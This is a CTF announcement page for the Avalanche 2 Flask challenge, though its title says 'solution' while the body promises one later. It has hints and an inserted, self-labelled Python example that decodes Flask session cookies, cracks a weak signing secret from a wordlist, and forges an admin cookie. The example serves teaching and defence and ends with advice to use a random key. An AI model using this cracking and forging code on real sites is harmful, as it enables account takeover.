Avalanche 2 CTF – the solution
Many have tried, none have succeeded. So here it is, the moment you’ve all been waiting for. The solution to our Avalanche 2 CTF!
We are delighted to make Avalanche2 CTF available! It is the second appearance of the Avalanche CTF platform, which is a petition/campaign website in the style of 38 Degrees or the UK Government petitions site.
With Avalanche we are presenting a CTF challenge that has clear learning objectives for anyone trying it. To complete it you will likely learn a few things along the way. It is also based on reality in two important ways:
· In a genuine application assessment, a penetration tester must find vulnerabilities within otherwise secure targets. To simulate that, the site has a full range of functionality. You are encouraged to interact with the site as a legitimate user would first, so that you discover the full range of functionality before seeking to exploit anything.
· Each part of the exploit chain mirrors a vulnerability we have located and exploited during real-world engagements.
Some may find it trivial, but it is a fair bet that many will spend several hours, or several evenings, on it.
On the road: A tale of two cities
We launched Avalanche2 with live events held simultaneously at OWASP Newcastle and Glasgow Defcon (DC44141) on December 3rd.
We love taking CTFs on the road so if you enjoy this challenge then do not be shy. Contact us and we could work with you in the future (though we cannot guarantee Micky will be wearing that amazing suit every time).
Hint 1: Google “baking flask cookies”
Hint 2: Google “Flask tutorial”
Hint 3: The password is in the wordlist stored inside the web root.
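The first two hints point at Flask's session cookie, which is signed (not encrypted) with the application's secret key. The example below is added here to illustrate that mechanism; it is not part of the original post, it is not the CTF's official solution, and nothing in it (the wordlist, the secret "changeme", the session contents) comes from the Avalanche image. It reimplements, in the standard library only, the scheme Flask uses through itsdangerous (URL-safe base64 JSON payload, a timestamp, and an HMAC-SHA1 over both under a key derived from the secret and the fixed salt "cookie-session"), so you can see why a guessable secret key lets anyone read, crack and then re-mint a session. Cross-check the exact format against a cookie minted by a real Flask app before relying on it.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Iterable, Optional

# Flask's session serializer is an itsdangerous URLSafeTimedSerializer with a
# fixed salt, HMAC-SHA1 and "hmac" key derivation. Reimplemented here with the
# standard library only, so the example runs without Flask installed.
SALT = b"cookie-session"


def _b64e(raw: bytes) -> bytes:
    """URL-safe base64 without padding, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(text: bytes) -> bytes:
    return base64.urlsafe_b64decode(text + b"=" * (-len(text) % 4))


def _signature(secret: bytes, signed_value: bytes) -> bytes:
    # Key derivation "hmac": the signing key is HMAC-SHA1(secret, salt); the
    # cookie body (payload + "." + timestamp) is then HMAC-SHA1'd under that key.
    key = hmac.new(secret, SALT, hashlib.sha1).digest()
    return _b64e(hmac.new(key, signed_value, hashlib.sha1).digest())


def dump_session(session: dict, secret: bytes, timestamp: Optional[int] = None) -> str:
    """Mint a Flask-style session cookie: payload.timestamp.signature"""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64e(compressed)  # a leading "." flags zlib compression
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    value = body + b"." + _b64e(ts_bytes)
    return (value + b"." + _signature(secret, value)).decode()


def decode_session(cookie: str) -> dict:
    """Read the session contents with NO key: the cookie is signed, not encrypted."""
    body, _ts, _sig = cookie.encode().rsplit(b".", 2)
    raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
    return json.loads(raw)


def verify_session(cookie: str, secret: bytes) -> bool:
    """True if the signature checks out under `secret` (no max_age check, as in Flask's default)."""
    value, sig = cookie.encode().rsplit(b".", 1)
    return hmac.compare_digest(_signature(secret, value), sig)


def crack_secret(cookie: str, wordlist: Iterable[str]) -> Optional[bytes]:
    """Offline dictionary attack: one captured cookie is enough to test every guess."""
    for word in wordlist:
        candidate = word.strip().encode()
        if candidate and verify_session(cookie, candidate):
            return candidate
    return None


# Constructed demo data (hypothetical): a weak secret that sits in a small wordlist.
# Nothing here is taken from the CTF image.
DEMO_WORDLIST = ["123456", "password", "letmein", "qwerty", "changeme", "s3cr3t"]
DEMO_SECRET = b"changeme"
DEMO_TS = 1575331200  # fixed so the output is reproducible


def demo() -> dict:
    cookie = dump_session({"user": "alice", "admin": False}, DEMO_SECRET, DEMO_TS)
    secret = crack_secret(cookie, DEMO_WORDLIST)
    forged = dump_session({"user": "alice", "admin": True}, secret, DEMO_TS)
    return {
        "readable_without_key": decode_session(cookie),
        "cracked_secret": secret,
        "forged_cookie": forged,
        "server_accepts_forgery": verify_session(forged, DEMO_SECRET),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Two things worth taking from this: the payload is readable by anyone who holds the cookie, so a session must never carry anything you would not show the user; and because verification is a pure function of the cookie and a guess, cracking is entirely offline and rate limiting on the server does nothing to stop it. Tools such as flask-unsign automate exactly this loop; the defence is a long random secret key, not a word from any list.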
- Download the CTF from here
- The zip file downloaded above includes a PDF guide to loading the VM in VMware/VirtualBox.
Where is the flag?
Your challenge is to get the password for the user with administrative privileges.
If you think you have figured out the password, then well done to you! Please respect that others will still be trying, so we politely request that you keep the method and flag secret. We will publish an official solution by February 2020. After that you can freely discuss how you tackled it.
We appreciate that you would like feedback sooner than that, so follow @PentestLtd on Twitter and send us a direct message. We can confirm whether you retrieved the correct flag and have a chat about how you did it.
Happy hunting to everyone